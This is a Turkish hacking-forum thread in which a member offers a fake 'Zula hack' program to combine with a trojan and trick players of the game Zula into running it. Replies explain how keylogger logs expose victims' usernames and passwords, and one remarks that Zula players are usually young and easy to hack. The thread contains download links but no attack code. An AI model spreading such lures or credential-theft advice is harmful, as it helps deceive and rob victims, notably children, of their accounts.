Zula Oynayan Herkesi Kandırın %100

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Pa4lakVRT

Katılımcı Üye
14 Ocak 2018
321
1
JurarTeam
Merhaba.

Nasılsınız Dostlar Sizi Gördüm Daha İyi Oldum Oturuyordum Dedimki THT Ailesine Hemen Bir Tane Zula Hack (Fake) Yapayım Dedim Proje Alttadır :) :) Oluşturduğunuz Trojen İle Birleştirip Adamı Kandırabilirsiniz :)

İndirme Linki: Dosya.tc - ?cretsiz, H?zl? ve Kolay Dosya Payla??m?

Virüs Total: https://www.virustotal.com/#/file/4...b3b385aebbe483069991e08345e79ac38ba/detection

V2'Si Geliştirilecektir.

Diğer Programıma Gitmek İçin >> http://www.turkhackteam.org/visual-basic/1671698-herkesi-kandirin.html

Programdan Görüntüler:
A1O9L7.png

Son düzenleme:

TugraS

Üye
30 Tem 2017
229
0
Sanırım fikri benden gördün,istersen iletişim adresini ver birlikte bu projeyi yürütebiliriz.

EmreSlgn

Katılımcı Üye
14 Ocak 2018
540
1
Mars
bunla adamın hesabını nasıl ele geçireceğiz? eline sağlık

Trojan içinde keylogger özelliği bulunuyorsa alabilirsin.
"E onca yazı var nasıl anlıyabilirim ki Zula'yı açıp yazdığını ?" dersen bazı trojanlerin/keyloggerlerin log kayıtları şu şekildedir.

[Açılan Program] Yazılan Yazı...
-------------------------------------------------------------------------------
Ekranda bulunan programın görev yöneticisindeki adını tarar.Açılan program kısmına görev yöneticisindeki adını koyar.
Daha sonra Zula oyununu açtıktan sonra tahminen ilk 2 kelime k. adı ve şifre olarak karşımıza çıkar.
Şimdi logumuza tekrar bakalım.

[zula.exe] BuBirKullanıcıAdı BuBirŞifre

Görev yöneticisindeki uzantıları çoğu keylogger/rat koyar.

bucuk3333

Katılımcı Üye
26 Haz 2014
671
0
Eline Sağlık kardeşim bende böyle bir proje yaparak THT ye sunmayı düşünüyorum. Temasını daha güzel hale getirebilirsin.

-İYİ FORUMLAR

fatiihh16

Yeni üye
6 Tem 2015
6
0
Bursa
TugraS fikri senden görmedim ama v2 sürümünü beraber geliştirebiliriz.

16player16 zula oynayanların yaşı genellikle küçük oluyor ve hackliyebilirsiniz

Ra4en yanlışım olduysa affola

SAĞOLUN GENÇLER YORUMLARINIZ İÇİN BUGÜN VEYA YARIN V2 SÜRÜMÜ ÇIKACAK BİR SSÜRÜ ÖZELLİK OLUCAK

Elinize sağlık, güzel konu.

Sağolun hocam beğendiğiniz için :)

denedim başarılı, uygulamayı bulamayanlar tweakboxa tıklamış olabilirler tweaked app ye tıklasınlar çünkü bende çok aradım.

Moderatör tarafında düzenlendi:
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.